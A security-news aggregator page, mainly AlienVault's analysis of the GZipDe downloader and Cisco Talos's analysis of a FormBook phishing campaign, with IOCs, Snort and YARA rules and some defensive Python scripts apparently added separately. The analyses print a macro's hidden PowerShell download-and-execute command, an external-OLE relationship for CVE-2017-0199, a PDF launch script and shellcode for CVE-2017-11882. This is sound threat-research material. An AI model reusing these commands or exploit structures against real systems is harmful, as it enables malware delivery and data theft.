Security Posts

ElevenPaths Professional Services: 40 job openings available

Some time ago, the ElevenPaths Professional Services group was created within Telefónica. It is a unit that forms part of the growth that cybersecurity services are experiencing in the group. We are currently looking for more than 40 professionals for that unit, and if your profile matches any of the following, or you think you can contribute to our team, get in touch with us.

Figure 1: ElevenPaths Professional Services: 40 job openings available

LOPD/GDPR Consultant
We are looking for LOPD and GDPR experts with a minimum of 3 to 5 years of experience in LOPD/GDPR implementation and audit projects to join the consulting team and carry out projects for our clients. Knowledge of ISO 27001, the Esquema Nacional de Seguridad, risk analysis and management, training and awareness, and a high level of English will be valued.

Regulatory Consultants
We are looking for professionals with at least 5 years of experience executing Security Master Plan projects, security assessments, risk analysis, business continuity and information security regulation projects. High level of English.

Consultants
We are looking for consultants with more than 5 years of experience in regulatory compliance and audit projects (ISO 27001, ISO 20000, PCI-DSS, ENS, CSA STAR, etc.) to execute projects for our clients. A technical background in systems and/or communications administration and the ability to liaise with clients, management, and technical and business departments will be valued very positively. And if you hold certifications, so much the better.

Technical Consultants for Security Projects
If you are interested in hardening, Identity Management projects, implementing a system that prevents data leakage, or analysing and designing security architectures globally (Monitoring, Cloud, IM, Network Security, etc.), and you have a good level of English, we are keen to work together.

Security Managers and Project Managers
We are looking for security managers and project managers with proven experience of at least 3 years in a similar position.

Network Architects
We are looking for architects with experience in network review projects for securing networks and/or proposing changes and improvements, architecture design, deployment, defence and support of security systems in large communication networks, technical knowledge of security in databases, operating systems, security systems and network technologies, system monitoring tools, etc.

Security Technicians
If you have a technical profile with knowledge of managing security equipment from the main vendors (Check Point, Palo Alto, Fortinet, etc.) and of the various security technologies on the market (cloud proxies, IPS, IDS, antivirus, etc.), we are keen for you to work with us.

Cyber Analysts
We are looking for technical cybersecurity analysts and intelligence analysts with more than 2 years of experience in similar positions. A good level of English is valued.

IoT Security Technical Product Manager
We are looking for an IoT security product manager with at least 3 years of experience in security product development, in IoT technologies (IoT technology stack: devices, connectivity, platforms, analytics and security) and in the main IoT security frameworks (GSMA, ENISA, etc.).

Senior Security Consultant with fluent English
We are looking for consultants with knowledge of the wholesale and telecommunications market, product marketing, systems architecture and security architecture, development of processes and procedures within a SOC, and RFPs (preparation and response). More than 5 years of experience in a similar position.

Internships and summer placements
Also, if you are interested, this summer or alongside your studies you can apply for one of our internships or one of our summer placements in information security projects.

If you are interested in any of these positions or want more information, write to us at tis.vacantes@telefonica.com.

Author: TIS HR Department
Follow Un informático en el lado del mal - Google+ RSS 0xWord
Categories: Security Posts

Validating Your Downloads

Didier Stevens - 6 hours 51 min ago
Occasionally, a comment is posted on my blog to report that the posted hash of a file doesn't match the hash of the downloaded file. Often, it's because the reader calculated the hash of my program, and not the hash of the downloaded ZIP file containing the program. Let's clarify this. Here is an example of download details I use in my blog posts:

hash_V0_0_5.zip (https)
MD5: 2A4D61F692D935E27E4BECA642F19D97
SHA256: 5DA5B59EBC6EB0FADEA868E631057BF14C29486405F75D8183C48FE4631B81A2

First you have the HTTP download link to the file, and then you have the HTTPS download link of the same file. Next, you have the MD5 hash and SHA256 hash of the hosted file, e.g. the ZIP file. The links and hashes are served by one host (blog.didierstevens.com), and the file is served by another host (didierstevens.com). To validate that the file you downloaded has not been tampered with, or corrupted during the download, you have to calculate the hash of the downloaded file (if it's a ZIP file, calculate the hash of the ZIP file, not of the archived files) and compare this with the hash I published. If you don't have a tool to do this, you can use my hash.py tool like this:
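As an added illustration (not Didier's hash.py, which is not reproduced here), the same check in plain Python: it hashes the downloaded bytes, compares them with the published values, and shows why hashing the program inside the archive instead of the ZIP itself gives a mismatch. The ZIP and its "published" hashes are constructed inside the script, not the real hash_V0_0_5.zip.

```python
import hashlib
import hmac
import io
import zipfile


def file_hashes(data: bytes) -> dict:
    """MD5 and SHA256 of a byte string, upper-case hex as printed on the blog."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA256": hashlib.sha256(data).hexdigest().upper(),
    }


def verify_download(data: bytes, published: dict) -> bool:
    """True only if every published hash matches the hash of the bytes actually downloaded."""
    actual = file_hashes(data)
    return all(
        algo in actual and hmac.compare_digest(actual[algo], value.upper())
        for algo, value in published.items()
    )


def archived_member_hashes(zip_data: bytes) -> dict:
    """Hash each file inside the ZIP: these are the values readers mistakenly compare."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(zip_data)) as zf:
        for name in zf.namelist():
            result[name] = file_hashes(zf.read(name))
    return result


SAMPLE_PROGRAM = b"print('constructed sample program')\n"   # constructed stand-in for hash.py


def build_sample_zip() -> bytes:
    """Constructed stand-in for a downloaded hash_V0_0_5.zip (fixed timestamp, so it is reproducible)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        info = zipfile.ZipInfo("hash.py", date_time=(2018, 6, 20, 0, 0, 0))
        zf.writestr(info, SAMPLE_PROGRAM)
    return buf.getvalue()


if __name__ == "__main__":
    downloaded = build_sample_zip()
    published = file_hashes(downloaded)       # what the blog post would list for this ZIP
    print("published       :", published)
    print("ZIP matches     :", verify_download(downloaded, published))          # True
    print("member hashes   :", archived_member_hashes(downloaded)["hash.py"])
    print("member matches  :", verify_download(SAMPLE_PROGRAM, published))      # False
    print("corrupted match :", verify_download(downloaded + b"\x00", published))  # False
```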
Categories: Security Posts

GZipDe: An Encrypted Downloader Serving Metasploit

AlienVault Blogs - Wed, 2018/06/20 - 18:44
At the end of May a Middle Eastern news network published an article about the next Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the area. It uses a piece of text taken from the report as a decoy.

This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.

Malicious Document
The file, which was uploaded to VirusTotal by a user in Afghanistan, contains macro malware embedded in a MS Office Word document (.doc). When opened, it executes a Visual Basic script stored as a hexadecimal stream, and executes a new task in a hidden PowerShell console:

'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F

Leveraging an HTTP request, it resolves to the following URL: http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

We are missing the next step of the infection chain as the server is now offline. Based on the common path we believe this file is related, and may be part of the later infection steps: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe

GZipDe - The Encrypted Downloader
The internal name of this malware is Gzipde, as specified by the path it was built on the attacker's machine: \Documents\Visual Studio 2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb

We found the original reverse-tcp payload publicly available on GitHub, although the attacker added an additional layer of encryption to that version.

It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection. The key is described as an array of bytes, with the values:

After decompression, it passes through a decryptor. The encryption method used is RC4 with a key length of 23 bytes. The malware allocates a new memory page with execute, read and write privileges. Then it copies the contents of the decrypted payload and launches a new thread to execute it.

The script uses the WaitForSingleObject C# class, meaning that the program accesses a mutex object. A special handler controls the access of the process to system resources. This prevents multiple instances of the same malware from running at a time, which would unnecessarily increase resource usage and produce more network noise.

The payload contains shellcode that contacts the server at 175.194.42[.]8. Whilst the server isn't up, Shodan recorded it serving a Metasploit payload. Metasploit is becoming a popular choice with targeted attacks.

The Metasploit payload
The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload - a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands. This shellcode loads the entire DLL into memory, so it's able to operate while writing no information to the disk. This operation is called Reflective DLL injection. From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network.

Thanks to Chris Doman and Jaime Blasco for collaboration.

Appendix
File Hashes
  • https://otx.alienvault.com/indicator/file/faf003c38758cf70b12bc4899714833e4713096c8f66163e753b3f0e70f2ba28
  • https://otx.alienvault.com/indicator/file/148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c
  • https://otx.alienvault.com/indicator/file/3932999be863d5844168e3bbb09ffc2f8d572a8f4a93946adb7e9c438f35c711
IP Addresses
  • 118.193.251[.]137
  • 175.194.42[.]8
URLs
  • http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe
  • http://118.193.251[.]137/dropbox/?p=BT67HU78HZ
Network Detection
Multi-purpose:
  • AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo)
  • ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host
  • ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate
Dedicated:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware CnC Checkin"; flow:established,to_server; content:"/dropbox/?p="; http_uri; depth:12; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; pcre:"/^\/dropbox\/\?p=[a-zA-Z0-9]*$/U"; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware Payload Request"; flow:established,to_server; content:"/dropbox/file"; depth:13; http_uri; content:".exe"; http_uri; distance:0; isdataat:!1,relative; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)
Unified Security Management (USM) Correlation Rules
  • System Compromise - Code Execution - Powershell Process Created by Office Word
  • Delivery & Attack - Suspicious Download - File Download via Office Macro
  • Environmental Awareness - Code Execution - Suspicious PowerShell Arguments
OTX Pulse
Yara Rule
rule gzipde_hunt
{
    meta:
        author = "AlienVault Labs"
        description = "Hunt rule to identify files related to Gzipde"
        copyright = "Alienvault Inc. 2018"
        reference = "https://otx.alienvault.com/pulse/5b239254174e5d5edab34e05"
    strings:
        $a = "118.193.251.137" nocase wide ascii
        $b = "BT67HU78HZ" nocase wide ascii
        $c = "2E0EB747-BE46-441A-A8B1-97AB27B49EC5" nocase wide ascii
        $d = "gzipde.pdb" nocase wide ascii
        $e = "C:\\Users\\jhon\\Documents\\Visual Studio 2008" nocase wide ascii
    condition:
        any of them
}

import "dotnet"

rule MeterpreterEncryptedPayloadDotNetGzipDE
{
    meta:
        type = "malware"
        description = "GZipDe"
        author = "jblasco@alienvault.com"
        reference1 = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp/blob/master/NativePayload_Reverse_tcp.cs"
        reference2 = "https://otx.alienvault.com/indicator/file/33c03d94f75698fac6a39a5a6c328c2be4a079717520e0ec411597b9ca3a9bef"
    strings:
        $pdb = "gzipde.pdb"
        $st1 = "PAGE_EXECUTE_READWRITE"
        $st2 = "EncryptInitalize"
        $st3 = "EncryptOutput"
        $st4 = "CreateThread"
        $st5 = "VirtualAlloc"
    condition:
        uint16(0) == 0x5A4D and (
            (dotnet.typelib == "c1181bc0-0102-44e9-82ba-7c1ca7d24219" and dotnet.guids[0] == "2e0eb747-be46-441a-a8b1-97ab27b49ec5")
            or $pdb
            or (dotnet.number_of_modulerefs == 1 and dotnet.modulerefs[0] == "kernel32" and all of ($st*))
        )
}
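An added analyst-side unpacker for the GZipDe stage described above, written for this page rather than taken from AlienVault: it reverses the three layers in the order the post gives (Base64, decompression, RC4 with a 23-byte key). It assumes the compression is gzip, as the downloader's name suggests; the key and payload it runs on are constructed placeholders, since the real key values appear only in the post's screenshot.

```python
import base64
import gzip


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA). Symmetric, so the same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                                  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                     # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def unpack_gzipde(b64_blob: str, key: bytes) -> bytes:
    """Reverse the stages the post describes, in order: Base64 -> decompress -> RC4 decrypt.

    Assumption: the compression layer is gzip. The 23-byte key length the
    post reports for this sample is enforced so a wrong key is caught early.
    """
    if len(key) != 23:
        raise ValueError(f"expected the 23-byte RC4 key reported for GZipDe, got {len(key)} bytes")
    compressed = base64.b64decode(b64_blob, validate=True)
    if compressed[:2] != b"\x1f\x8b":
        raise ValueError("decoded blob does not start with the gzip magic 1f 8b")
    return rc4(key, gzip.decompress(compressed))


def pack_sample(payload: bytes, key: bytes) -> str:
    """Builds a blob with the same layering, purely to give the unpacker something to run on."""
    return base64.b64encode(gzip.compress(rc4(key, payload), mtime=0)).decode("ascii")


# Constructed stand-ins: neither the real key nor real stage-2 content.
SAMPLE_KEY = bytes(range(0x41, 0x41 + 23))
SAMPLE_PAYLOAD = b"\x90" * 8 + b"CONSTRUCTED STAGE-2 PLACEHOLDER, NOT SHELLCODE"


if __name__ == "__main__":
    blob = pack_sample(SAMPLE_PAYLOAD, SAMPLE_KEY)
    print("Base64 blob:", blob[:48] + "...")
    print("Recovered  :", unpack_gzipde(blob, SAMPLE_KEY))
```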
Categories: Security Posts

SCADA Hacking – Industrial Systems Woefully Insecure

Darknet - The Darkside - Wed, 2018/06/20 - 17:37
It seems like SCADA hacking is still a topic in hacker conferences, and it should be, with SCADA systems still driving power stations, manufacturing plants, refineries and all kinds of other powerful and dangerous things. The latest talk given on the subject shows that with just 4 lines of code and a small hardware drop device a SCADA-based facility can be effectively DoSed by sending repeated shutdown commands to susceptible systems. Read the rest of SCADA Hacking – Industrial Systems Woefully Insecure now! Only available at Darknet.
Categories: Security Posts

My Little FormBook

Cisco Talos - Wed, 2018/06/20 - 17:00
This blog post is authored by Warren Mercer and Paul Rascagneres.

Summary
Cisco Talos has been tracking a new campaign involving the FormBook malware since May 2018 that utilizes four different malicious documents in a single phishing email. FormBook is an inexpensive stealer available as "malware as a service." This means an attacker can purchase a compiled piece of malware based on their desired parameters. This is commonplace with crimeware and stealer type malware such as FormBook. It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots.



The author put a lot of effort in the infection vector using multiple malicious documents in a single phishing email. The author also mixed different file formats (PDF and Microsoft Office document) and used two public Microsoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in order to drop the final payload on the targeted system. The final payload was downloaded during the campaign from a small Japanese file-sharing platform. The platform owner has since deleted the malicious payload binaries from their system. Here is the infection workflow:

We identified an infrastructure overlap between this campaign and a previous campaign we published in February 2017 relating to Pony malware, which utilized Microsoft Publisher files to deliver its payload. The actor behind these two attacks may be the same, given the overlap in the two attacks' infrastructure. If that is the case, the actor could switch between Pony and FormBook to be able to continue their malicious activities for more than a year.

Infection Vector
Phishing Campaign
This campaign starts with a malicious email containing two attachments. Here is a snippet of the email:

The email pretends to be an order sent from the sales department of a company located in Spain. The website's details and phone number appear to have been copied from that of a genuine company.

The email contains two attachments:

  • A blank malicious Microsoft Office document template file. (.dotm)
  • A malicious PDF document that is also blank. (.pdf)
First Office MalDoc (Attached)
The email contains two attachments as mentioned. One of these is a Microsoft Office document template file. This file type is normally used to share templates. The 'normal.dotm' file is the default Microsoft Word template that opens when Word is launched. The attacker, however, does not use the .dotm file format to share templates, but rather to download an additional Office document.

If an example document from the campaign, named "STMORDER-442799.dotm," is opened, it appears blank. However, like most Office documents, if the file is unzipped and opened, you can access the attributes and XML information. This is where the attacker leverages CVE-2017-0199 to trigger an external download by abusing the relationship elements within "STMORDER-442799\word\_rels\document.xml.rels." Despite the file appearing to be blank, it does contain a large amount of XML information. We see the <Relationship> elements being abused:
<Relationship Id="_id_2970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc"/></Relationships>
This will cause the following document to be downloaded and executed from a Japanese file-hosting platform.

At the time of publishing, this file is no longer available and trying to view it results in a 404 error. The platform maintainer of PyonPyon.moe provides a list of malware that has been removed from the hosting platform — this can be found here. Within this data, we can identify our attempted download of the .doc file, among others related to this campaign, which were removed on the same day, June 8:
We were able to obtain multiple .doc files in relation to this campaign, which we will discuss later on. These .doc files are in rich text format (RTF), which leveraged CVE-2017-11882.
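An added triage check for the relationship abuse just described (example code, not Talos tooling): it opens an OOXML container and lists every relationship of Type oleObject with TargetMode="External", the exact shape the CVE-2017-0199 lure depends on. The .dotm it scans is a minimal package constructed in the script that carries the defanged Relationship element quoted above, alongside a benign package whose OLE object stays inside the archive.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def external_ole_relationships(doc_bytes: bytes):
    """Return (rels part, Id, Target) for each oleObject relationship whose target lies outside the package.

    A legitimate embedded OLE object is an internal part (embeddings/...);
    Type=oleObject combined with TargetMode="External" is what makes Office
    fetch and load a remote document.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue                      # malformed part: outside this check's scope
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL:
                    findings.append((name, rel.get("Id"), rel.get("Target")))
    return findings


def build_sample_package(rels_xml: str) -> bytes:
    """Constructed, minimal OOXML container: enough structure for the scanner, not a real Word template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", f'<?xml version="1.0"?><Relationships xmlns="{REL_NS}"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# The element quoted in the post (URL kept defanged exactly as printed there), next to a normal internal one.
MALICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    f'<Relationship Id="_id_2970" Type="{OLE_REL}" TargetMode="External" Target="hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc"/>'
    "</Relationships>"
)
# An ordinary embedded object stays inside the package: no External mode, so it must not be flagged.
BENIGN_RELS = (
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId2" Type="{OLE_REL}" Target="embeddings/oleObject1.bin"/>'
    "</Relationships>"
)


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        hits = external_ole_relationships(build_sample_package(rels))
        print(f"{label}: {hits or 'no external OLE relationships'}")
```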

PDF document (Attached)
Also, attached to the initial email is a PDF file which contains a JavaScript object:
this.exportDataObject({ cName: "mine001.dotm", nLaunch: 2 });
This code launches a file embedded within the PDF document. In our case, the file is an Office document named "mine001.dotm."

Second Office MalDoc (Embedded)
The embedded Office document is exactly the same as the attached document discussed above. We don't know why the author of this campaign puts the same file in two separate locations, or whether it's on purpose or a mistake made during the phishing generation stage. It's possible the actor did not intend to attach both the DOTM and the PDF.

Third Office MalDoc (Downloaded)
The final malicious Office document is an RTF document. This RTF document contains an object linking and embedding (OLE) stream at the offset 0x9F (header d0 cf 11 e0 a1 b1 1a e1):
00000040 36 39 30 36 64 30 34 33 30 32 30 30 30 30 30 30 |6906d04302000000|
00000050 31 37 30 30 30 30 30 30 37 32 34 37 35 35 33 30 |1700000072475530|
00000060 33 32 37 37 34 65 37 35 36 64 37 36 33 36 34 66 |32774e756d76364f|
00000070 35 30 36 66 36 32 34 62 37 34 35 38 34 37 33 32 |506f624b74584732|
00000080 37 36 35 31 30 30 30 30 30 30 30 30 30 30 30 30 |7651000000000000|
00000090 30 30 30 30 30 30 30 30 31 30 30 30 30 30 64 30 |00000000100000d0|
000000a0 63 66 31 31 65 30 61 31 62 31 31 61 65 31 30 30 |cf11e0a1b11ae100|
000000b0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
000000c0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 65 |000000000000003e|
000000d0 30 30 30 33 30 30 66 65 66 66 30 39 30 30 30 36 |000300feff090006|
000000e0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
000000f0 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 |0000000100000001|
00000100 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
Here we have the beginning of the OLE compound file (CF) object, referred to as OLECF.

This OLECF object contains a compound file binary format (CFBF) object. This file format is described here. The object is linked to the COM object "0002ce02-0000-0000-c000-000000000046":
00000400 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 |R.o.o.t. .E.n.t.|
00000410 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 |r.y.............|
00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000440 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00 |................|
00000450 02 ce 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|
00000460 00 00 00 00 00 00 00 00 00 00 00 00 d0 e9 36 77 |..............6w|
00000470 7f fc d3 01 03 00 00 00 c0 07 00 00 00 00 00 00 |................|
00000480 01 00 4f 00 6c 00 65 00 31 00 30 00 4e 00 61 00 |..O.l.e.1.0.N.a.|
00000490 74 00 69 00 76 00 65 00 00 00 00 00 00 00 00 00 |t.i.v.e.........|
000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
This CLSID is the ID of the Equation Editor as mentioned by Microsoft. Finally, here is where and how the exploit is executed:
00000800 98 07 00 00 03 d4 01 6a 72 0a 01 08 7f a9 b8 c3 |.......jr.......|
00000810 42 ba ff f7 d0 8b 38 8b 37 bd c6 98 b9 ff f7 d5 |B.....8.7.......|
00000820 8b 4d 77 56 ff d1 05 63 d6 2d 0b 2d 4d d5 2d 0b |.MwV...c.-.-M.-.|
00000830 ff e0 fa d3 6e 4a c9 6a 83 53 e8 d1 41 00 1e b6 |....nJ.j.S..A...|
00000840 29 1d e6 71 de 92 60 23 40 9d 40 0e 7a d8 9a d6 |)..q..`#@.@.z...|
00000850 26 43 86 98 e0 c4 4e b8 1d 7d 82 46 ce 45 07 be |&C....N..}.F.E..|
00000860 82 15 f0 31 ec 1e 49 93 a2 d4 ef b5 da ae e8 39 |...1..I........9|
00000870 ff d3 ab 65 88 29 2b 4e be b9 ec 16 e5 7f ab d6 |...e.)+N........|
00000880 08 a7 ec 69 51 38 1f 97 27 27 7d f9 f3 f2 65 83 |...iQ8..''}...e.|
The red value (the colours refer to the highlighting in the original post) is the stream length.

The blue value is the Equation Editor MTEF header, starting with 0x03.

The green value is the font record, starting with 0x08. The vulnerability is an overflow of the font name, shown in grey in the snippet above. The overflow redirects control flow to the RET at address 0x0041d1e8 (in pink).
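An added triage routine, not from the Talos post, that automates the two checks walked through above: it decodes the hex \objdata stream of an RTF, locates the CFBF header, follows the header to the directory and reads the Root Entry CLSID, then compares it with the Equation Editor CLSID. The RTF it scans is constructed in the script (a bare CFBF container carrying that CLSID and nothing else, no MTEF or exploit content); the OLE1 class name in the wrapper and the second CLSID are made up.

```python
import re
import struct
import uuid

CFBF_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# CLSID the post ties to the Equation Editor (the CVE-2017-11882 target).
EQUATION_EDITOR_CLSID = uuid.UUID("0002ce02-0000-0000-c000-000000000046")
SAMPLE_OTHER_CLSID = uuid.UUID("12345678-1234-1234-1234-123456789abc")   # constructed, not a real class


def objdata_blobs(rtf: bytes):
    """Yield the decoded bytes of every \\objdata group (triage heuristic, not a full RTF parser)."""
    for m in re.finditer(rb"\\objdata\b", rtf):
        depth, i, hexchars = 1, m.end(), bytearray()
        while i < len(rtf) and depth:
            c = rtf[i:i + 1]
            if c == b"\\":                      # control word: skip it so its letters are not read as hex
                i += 1
                while i < len(rtf) and rtf[i:i + 1].isalnum():
                    i += 1
                continue
            if c == b"{":
                depth += 1
            elif c == b"}":
                depth -= 1
            elif c in b"0123456789abcdefABCDEF":
                hexchars += c
            i += 1
        if len(hexchars) % 2:                   # drop a dangling nibble
            hexchars = hexchars[:-1]
        yield bytes.fromhex(hexchars.decode("ascii"))


def root_entry_clsid(ole: bytes):
    """Follow the CFBF header to directory entry 0 (Root Entry) and return its CLSID.

    Header: sector shift at 0x1E, first directory sector at 0x30. Directory
    entries are 128 bytes: object type at 0x42 (5 = root storage), CLSID at 0x50.
    """
    if not ole.startswith(CFBF_MAGIC) or len(ole) < 512:
        return None
    sector_shift = struct.unpack_from("<H", ole, 0x1E)[0]
    first_dir_sector = struct.unpack_from("<I", ole, 0x30)[0]
    if sector_shift not in (9, 12):
        return None
    off = (first_dir_sector + 1) << sector_shift
    if off + 128 > len(ole) or ole[off + 0x42] != 5:
        return None
    return uuid.UUID(bytes_le=bytes(ole[off + 0x50:off + 0x60]))


def triage_rtf(rtf: bytes):
    """One finding per embedded OLE object: CFBF offset inside the decoded stream and its root CLSID."""
    findings = []
    for blob in objdata_blobs(rtf):
        pos = blob.find(CFBF_MAGIC)
        if pos < 0:
            continue
        clsid = root_entry_clsid(blob[pos:])
        findings.append({
            "cfbf_offset": pos,
            "clsid": str(clsid) if clsid else None,
            "equation_editor": clsid == EQUATION_EDITOR_CLSID,
        })
    return findings


def build_sample_rtf(clsid: uuid.UUID) -> bytes:
    """Constructed RTF with a minimal CFBF container whose Root Entry has the given CLSID (no exploit content)."""
    header = bytearray(512)
    header[0:8] = CFBF_MAGIC
    struct.pack_into("<H", header, 0x1E, 9)            # 512-byte sectors
    struct.pack_into("<I", header, 0x30, 0)            # directory lives in sector 0
    entry = bytearray(128)
    name = "Root Entry".encode("utf-16-le") + b"\x00\x00"
    entry[0:len(name)] = name
    struct.pack_into("<H", entry, 0x40, len(name))     # 0x16, as in the post's dump
    entry[0x42] = 5                                     # root storage
    entry[0x50:0x60] = clsid.bytes_le
    ole = bytes(header) + bytes(entry).ljust(512, b"\x00")
    # OLE1 wrapper, same layout as the post's first dump: version, format 2 (embedded),
    # class name length + name, empty topic/item names, then the data length.
    class_name = b"SampleClass\x00"                     # made-up class name
    ole1 = (b"\x01\x05\x00\x00" + struct.pack("<I", 2) + struct.pack("<I", len(class_name)) + class_name
            + struct.pack("<II", 0, 0) + struct.pack("<I", len(ole)) + ole)
    return b"{\\rtf1{\\object\\objemb{\\*\\objdata " + ole1.hex().encode("ascii") + b"}}}"


if __name__ == "__main__":
    for hit in triage_rtf(build_sample_rtf(EQUATION_EDITOR_CLSID)):
        print(hit)
```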

Finally, a shellcode is executed.

Here is the first stage of the shellcode:
user@laptop:$ rasm2 -d B8C342BAFFF7D08B388B37BDC698B9FFF7D58B4D7756FFD10563D62D0B2D4DD52D0BFFE0
mov eax, 0xffba42c3
not eax
mov edi, dword [eax]
mov esi, dword [edi]
mov ebp, 0xffb998c6
not ebp
mov ecx, dword [ebp + 0x77]
push esi
call ecx
add eax, 0xb2dd663
sub eax, 0xb2dd54d
jmp eax
The purpose is to execute GlobalLock() (first call) and to finally jump in the second stage of the shellcode in bold orange in the hexadecimal code.

The purpose is to download and execute a binary located on a compromised WordPress website (hxxp://irishlebanese[.]com/wp-admin/images/eight/mine001.exe).


Final payload: FormBook
The final payload is located on a compromised WordPress website (hxxp://irishlebanese[.]com/). The malware author stored many PE32 files on this server, some of which are still available. We have included more than 30 hashes of files stored on this server in the IOCs section. The most recent samples are FormBook samples.

FormBook is an inexpensive stealer available as "malware as a service." It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots. This post does not describe the malware in-depth, since there are excellent posts on the malware written by other researchers.

Overlaps with previous campaigns
In February 2017, we published an article about another stealer using Publisher and a public exploit to compromise systems. We found three interesting samples related to this case and our current FormBook case:

  • 5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 (located at hxxp://irishlebanese[.]com/wp-admin/admin/dor001.exe in May 2018)
  • 82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)
  • 8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)


These three samples use the same FormBook infrastructure and the Pony infrastructure mentioned in our previous article:

  • hxxp://alphastand[.]top/alien/fre.php -> command and control (C2) server from 2017
  • hxxp://ukonlinejfk[.]ru/mine/fre.php
  • hxxp://alphastand[.]trade/alien/fre.php -> C2 server from 2017
  • hxxp://igtckeep[.]com/dor/fre.php
  • hxxp://alphastand[.]win/alien/fre.php -> C2 server from 2017
  • hxxp://kbfvzoboss[.]bid/alien/fre.php -> C2 server from 2017
